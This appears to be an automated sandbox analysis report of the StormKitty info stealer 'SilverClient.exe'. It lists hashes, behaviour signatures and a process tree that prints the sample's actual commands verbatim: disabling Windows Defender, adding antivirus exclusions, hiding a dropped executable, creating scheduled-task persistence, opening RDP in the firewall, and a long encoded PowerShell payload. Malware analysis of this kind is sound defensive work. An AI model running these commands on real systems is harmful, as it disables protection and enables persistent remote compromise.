Analysis
-
max time kernel
832s -
max time network
836s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
-
submitted
02-09-2024 22:46
General
-
Target
SilverClient.exe
-
Size
43KB
-
MD5
16edc9184a4f2e4c18200304594d43d9
-
SHA1
9328f1016cf247a13b110d6ece2826ba4ad5a8cf
-
SHA256
be652d4e5771a47651e037776bbd47e90d3ab7de28e61e3c86abfc4b76c813dd
-
SHA512
196f4c9b55d2883b4c7364aca90741a9e606952e2c798b2c4075a661768dab274b5b6683280404ff31eed98a11003991c67f7af4d61cf48dd131e7365a3cf74d
-
SSDEEP
768:UsvI7cIxr7BcD1wjWxYQ4xJNHVR8kq/5h34vCvZPxaxP4RULQv9S6HPz1QB6Si/o:UsvwcIxrgwkbcrq/5xcl4Gsv9j71QoJg
Malware Config
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
-
Disables RegEdit via registry modification 1 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops desktop.ini file(s) 2 IoCs
-
Modifies WinLogon 2 TTPs 4 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 7 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 49 IoCs
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Program Files\Windows Defender\MSASCuiL.exe"C:\Program Files\Windows Defender\MSASCuiL.exe"4⤵
-
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -DisableService3⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\SilverClient.exe"C:\Users\Admin\AppData\Local\Temp\SilverClient.exe"1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Loader"2⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Loader\$77WindowsDefender.exe"2⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3BAC.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Loader\$77WindowsDefender.exe"C:\Users\Admin\Loader\$77WindowsDefender.exe"3⤵
- UAC bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77WindowsDefender.exe4⤵
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "$77WindowsDefender.exe" /TR "C:\Users\Admin\Loader\$77WindowsDefender.exe \"\$77WindowsDefender.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77WindowsDefender.exe4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "WindowsDefender_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:004⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff872069758,0x7ff872069768,0x7ff8720697785⤵
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1560 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:25⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1824 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=2044 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2888 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2928 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4292 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4832 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4912 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4924 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4668 --field-trial-handle=1808,i,12226220557961723157,9447069434950902791,131072 /prefetch:85⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command Enable-NetFirewallRule -DisplayGroup 'Remote Desktop' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath %ProgramFiles%\RDP Wrapper & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command Enable-NetFirewallRule -DisplayGroup 'Remote Desktop' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass -WindowStyle Hidden -Command netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath %ProgramFiles%\RDP Wrapper & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77WindowsDefender.exe4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJ